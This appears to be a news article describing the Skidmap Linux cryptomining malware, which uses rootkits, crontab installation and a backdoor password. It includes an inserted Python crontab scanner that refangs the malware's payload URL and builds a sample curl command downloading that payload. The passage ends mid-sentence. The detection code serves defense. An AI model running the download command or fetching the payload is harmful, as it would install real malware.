This New Linux Malware Mines Crypto By Creating Malign Linux Modules


Cybersecurity research firm TrendMicro has come across a new Linux malware. The malware — Skidmap — is capable of illicit cryptocurrency mining activities.


Skidmap is the new Linux malware in town


According to the research, the new Linux malware mines crypto by creating malicious loadable kernel modules (LKM) to stay under wraps. Because the malware uses Linux kernel module rootkits, it is difficult to detect and patch: it can overwrite and modify parts of the kernel.






Apart from cryptocurrency mining, the new Linux malware can grant the attackers backdoor access to the affected system by creating a secret master password that allows unauthorized access by anyone.


How does Skidmap malware work?


Skidmap Linux malware enters the system via crontab (commands that schedule recurring jobs on Unix-like operating systems). Once it gets into the victim system, it installs malicious binaries (“pc”), which eventually lower the security settings of the device in order to conduct the crypto mining.


However, there is no word on which cryptocurrency the malware mines.


To inject a system with a cryptocurrency miner, the malware first determines whether the system’s OS is based on Debian or RHEL/CentOS.





For a Debian-based system, it infects the system by saving the crypto miner payload to “/tmp/miner2”. An RHEL/CentOS-based system gets its crypto miner payload and other components in the form of a tar file from the URL “hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz”.
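The two indicators above (the payload URL and the “/tmp/miner2” path) can be checked against crontab contents. The following is an added example, not code from TrendMicro or the article: it keeps the URL defanged in source, refangs it at run time, and matches whole hostnames and exact paths so look-alikes do not trigger. The function names and the sample crontab lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Indicators exactly as the article prints them (kept defanged in source).
DEFANGED_URL = "hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz"
MINER_PATH = "/tmp/miner2"


def refang(ioc):
    """Undo hxxp / [.] defanging so the indicator matches raw text."""
    return re.sub(r"^hxxp", "http", ioc, flags=re.I).replace("[.]", ".")


def build_patterns():
    host = urlsplit(refang(DEFANGED_URL)).hostname
    return {
        # Whole-hostname match: reject look-alikes that merely contain it.
        "payload_host": re.compile(
            r"(?<![\w.-])" + re.escape(host) + r"(?![\w-]|\.\w)", re.I),
        # Exact path: "/tmp/miner2.bak" or "/tmp/miner2x" must not match.
        "miner_path": re.compile(re.escape(MINER_PATH) + r"(?![\w.-])"),
    }


def scan_cron(text):
    """Return (line_no, indicator, line) for each active cron line that hits."""
    patterns = build_patterns()
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):  # skip blanks and comments
            continue
        hits += [(n, name, line) for name, rx in patterns.items() if rx.search(line)]
    return hits


def sample_cron():
    """Constructed crontab text for the demo; not taken from a real host."""
    url = refang(DEFANGED_URL)
    host = urlsplit(url).hostname
    return "\n".join([
        "# constructed sample",
        "*/5 * * * * /usr/local/bin/backup.sh",
        f"# curl {url}",                                # comment: ignored
        f"*/10 * * * * curl -fsSL {url} -o /tmp/c.tgz",  # payload_host hit
        "@reboot /tmp/miner2 >/dev/null 2>&1",          # miner_path hit
        "0 3 * * * /tmp/miner2.bak.sh",                 # different file: no hit
        f"0 4 * * * wget http://{host}.example.org/x",  # look-alike: no hit
    ])
```

Because the article describes kernel-module rootkits, which can hide files from userland tools, feed `scan_cron` crontab files read from an offline disk image or a trusted boot environment rather than from the running system.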


In addition to this, the Linux malware devises another method of unauthoriz ..
